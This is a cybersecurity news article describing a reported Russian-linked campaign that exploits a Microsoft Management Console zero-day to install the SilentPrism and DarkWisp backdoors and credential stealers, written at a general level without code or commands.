Russian Hackers Exploit Windows Zero-Day to Deploy SilentPrism and DarkWisp Backdoors

Cybersecurity researchers have uncovered a sophisticated cyber campaign by Water Gamayun—a suspected Russian hacking group also known as EncryptHub and LARVA-208—involving the deployment of two new backdoors, SilentPrism and DarkWisp.

  Europe Cyber affairs News   Apr 1, 2025  Add to Reading List
Russian Hackers Exploit Windows Zero-Day to Deploy SilentPrism and DarkWisp Backdoors

Cybersecurity researchers have uncovered a sophisticated cyber campaign by Water Gamayun—a suspected Russian hacking group also known as EncryptHub and LARVA-208—involving the deployment of two new backdoors, SilentPrism and DarkWisp.

Exploiting CVE-2025-26633 for Malware Deployment

The attackers have been actively exploiting CVE-2025-26633 (also referred to as MSC EvilTwin), a vulnerability in the Microsoft Management Console (MMC), to execute malware via malicious .msc files.

Using provisioning packages (.ppkg), signed Microsoft Installer files (.msi), and .msc files, Water Gamayun delivers information stealers and persistent backdoors capable of exfiltrating sensitive data.

SilentPrism and DarkWisp: Stealthy PowerShell-Based Backdoors

The SilentPrism malware operates as a PowerShell implant designed to maintain remote control, execute commands, and establish persistence, while also incorporating anti-analysis techniques to evade detection.

Meanwhile, DarkWisp is another PowerShell-based backdoor used for system reconnaissance, data exfiltration, and long-term persistence. It continuously listens for Base64-encoded commands sent over TCP port 8080, ensuring a steady command-and-control (C&C) connection with the attackers.

Weaponized Loaders and Advanced Stealer Variants

Water Gamayun also deploys a custom malware loader, MSC EvilTwin, which leverages CVE-2025-26633 to execute malicious .msc files, ultimately leading to the installation of Rhadamanthys Stealer. This stealer, along with StealC and EncryptHub Stealer variants, is designed to extract system information, credentials, Wi-Fi passwords, and cryptocurrency wallet recovery phrases.

A notable feature of EncryptHub Stealer is its use of living-off-the-land binaries (LOLBins), specifically IntelliJ’s "runnerw.exe", to proxy the execution of remote PowerShell scripts.

Malware Distribution and Remote Control Capabilities

The attackers distribute their malware through malicious MSI installers masquerading as popular messaging apps like DingTalk, QQTalk, and VooV Meeting. These installers download and execute PowerShell scripts to install AnyDesk for remote access and enable attackers to send encoded commands to compromised systems.

Sophisticated Tactics Ensure Persistence and Evasion

Trend Micro researchers highlight Water Gamayun’s adaptability, using signed MSI files, LOLBins, and obfuscated payloads to maintain persistent control over infected systems while concealing their activities.

This campaign underscores the growing complexity of cyber threats, emphasizing the need for proactive security measures to defend against zero-day exploits and advanced malware tactics.